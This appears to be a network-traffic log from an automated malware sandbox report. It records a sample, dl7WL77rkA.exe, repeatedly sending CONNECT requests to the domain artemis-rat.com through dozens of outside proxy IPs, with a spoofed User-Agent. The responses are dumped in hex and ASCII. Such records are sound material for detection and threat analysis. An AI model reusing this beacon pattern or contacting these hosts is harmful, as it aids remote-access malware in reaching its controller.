                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:37.637679100 CET741INHTTP/1.1 500 Internal Server Error
                                                                                                                                                                                                                                                            Server: nginx/1.25.0
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:37 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 579
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 35 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>500 Internal Server Error</title></head><body><center><h1>500 Internal Server Error</h1></center><hr><center>nginx/1.25.0</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            18192.168.2.549830162.159.247.57803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:37.408575058 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:37.569703102 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:37 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            19192.168.2.54992545.144.30.2324433876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:37.416883945 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            20192.168.2.54992645.144.30.2324433876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:37.417731047 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            21192.168.2.54992745.144.30.2324433876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:37.419487953 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            22192.168.2.54992945.144.30.2324433876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:37.420969009 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            23192.168.2.549847172.67.253.69803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:37.427696943 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:37.582329035 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:37 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            24192.168.2.549824209.126.104.38124573876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:37.445537090 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:37.967304945 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.592367887 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.842346907 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.389673948 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            25192.168.2.549765213.57.128.161803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:37.454576015 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:37.820988894 CET340INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: nginx/1.12.2
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:37 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Content-Length: 173
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.2</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            26192.168.2.549869172.67.181.32803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:37.454895973 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:37.609363079 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:37 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            27192.168.2.54980020.33.5.2788883876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:37.492280006 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:11.474437952 CET39INHTTP/1.1 200 Connection established
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:12.360048056 CET39INHTTP/1.1 200 Connection established
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:13.384021997 CET39INHTTP/1.1 200 Connection established
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:15.368083954 CET39INHTTP/1.1 200 Connection established
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:19.272279024 CET39INHTTP/1.1 200 Connection established
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:27.400398970 CET39INHTTP/1.1 200 Connection established
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:43.276422977 CET39INHTTP/1.1 200 Connection established


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            28192.168.2.549796201.91.82.15531283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:37.494658947 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.166440010 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.139245987 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.224004984 CET19INHTTP/1.1 200 OK


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            29192.168.2.54984292.204.135.37269273876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:37.495670080 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.014184952 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.670506001 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.983014107 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.702316046 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.389868975 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            30192.168.2.549877167.172.158.5580003876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:37.562263966 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            31192.168.2.54985472.195.34.5841453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:37.562437057 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            32192.168.2.54981843.155.142.116156733876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:37.562813997 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            33192.168.2.549887178.128.156.21980003876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:37.562913895 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            34192.168.2.54983388.99.138.2150883876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:37.563111067 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            35192.168.2.549822121.182.138.71803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:37.563747883 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            36192.168.2.549798113.143.37.8290023876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:37.565491915 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:37.900496006 CET311INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:37 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 166
                                                                                                                                                                                                                                                            Connection: close
